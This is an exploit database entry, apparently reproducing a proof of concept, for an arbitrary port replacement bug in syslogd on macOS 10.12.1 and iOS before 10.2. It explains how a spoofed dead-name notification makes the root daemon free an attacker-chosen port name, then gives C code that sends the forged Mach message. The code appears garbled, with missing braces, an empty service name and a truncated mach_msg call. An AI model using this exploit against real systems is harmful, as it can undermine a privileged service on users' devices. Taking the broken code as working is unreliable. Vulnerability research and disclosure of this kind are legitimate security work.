macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement

st3n 22.12.2016 Verified
Denial of Service Exploits Multiple

Exploit Code


syslogd (running as root) hosts the mach service. It's part of the
sandbox profile and so reachable from a lot of sandboxed contexts.

Here's a snippet from its mach message handling loop listening on the service port:

    ks = mach_msg(&(request->head), rbits, 0, rqs, global.listen_set, 0, MACH_PORT_NULL);
    if (request->head.msgh_id == MACH_NOTIFY_DEAD_NAME)
      deadname = (mach_dead_name_notification_t *)request;
      dispatch_async(asl_server_queue, ^{
        /* dead name notification includes a dead name right */
        mach_port_deallocate(mach_task_self(), deadname->not_port);

An attacker with a send-right to the service can spoof a MACH_NOTIFY_DEAD_NAME message and cause an
arbitrary port name to be passed to mach_port_deallocate as deadname->not_port doesn't name a port right
but is a mach_port_name_t which is just a controlled integer.

An attacker could cause syslogd to free a privilged port name and get it reused to name a port for which
the attacker holds a receive right.

Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555)

// ianbeer

#if 0
MacOS/iOS arbitrary port replacement in syslogd

syslogd (running as root) hosts the mach service. It's part of the
sandbox profile and so reachable from a lot of sandboxed contexts.

Here's a snippet from its mach message handling loop listening on the service port:

		ks = mach_msg(&(request->head), rbits, 0, rqs, global.listen_set, 0, MACH_PORT_NULL);
		if (request->head.msgh_id == MACH_NOTIFY_DEAD_NAME)
			deadname = (mach_dead_name_notification_t *)request;
			dispatch_async(asl_server_queue, ^{
				/* dead name notification includes a dead name right */
				mach_port_deallocate(mach_task_self(), deadname->not_port);

An attacker with a send-right to the service can spoof a MACH_NOTIFY_DEAD_NAME message and cause an
arbitrary port name to be passed to mach_port_deallocate as deadname->not_port doesn't name a port right
but is a mach_port_name_t which is just a controlled integer.

An attacker could cause syslogd to free a privilged port name and get it reused to name a port for which
the attacker holds a receive right.

Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555)

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#include <servers/bootstrap.h>
#include <mach/mach.h>
#include <mach/ndr.h>

char* service_name = "";

struct notification_msg {
    mach_msg_header_t   not_header;
    NDR_record_t        NDR;
    mach_port_name_t not_port;

mach_port_t lookup(char* name) {
  mach_port_t service_port = MACH_PORT_NULL;
  kern_return_t err = bootstrap_look_up(bootstrap_port, name, &service_port);
  if(err != KERN_SUCCESS){
    printf("unable to look up %s\n", name);
    return MACH_PORT_NULL;
  return service_port;

int main() {
  kern_return_t err;

  mach_port_t service_port = lookup(service_name);

  mach_port_name_t target_port = 0x1234; // the name of the port in the target namespace to destroy

  printf("%d\n", getpid());
  printf("service port: %x\n", service_port);

	struct notification_msg not = {0};

  not.not_header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
  not.not_header.msgh_size = sizeof(struct notification_msg);
  not.not_header.msgh_remote_port = service_port;
  not.not_header.msgh_local_port = MACH_PORT_NULL;
  not.not_header.msgh_id = 0110; // MACH_NOTIFY_DEAD_NAME

	not.NDR = NDR_record;

	not.not_port = target_port;

  // send the fake notification message
  err = mach_msg(&not.not_header,
                 (mach_msg_size_t)sizeof(struct notification_msg),
  printf("fake notification message: %s\n", mach_error_string(err));
  return 0;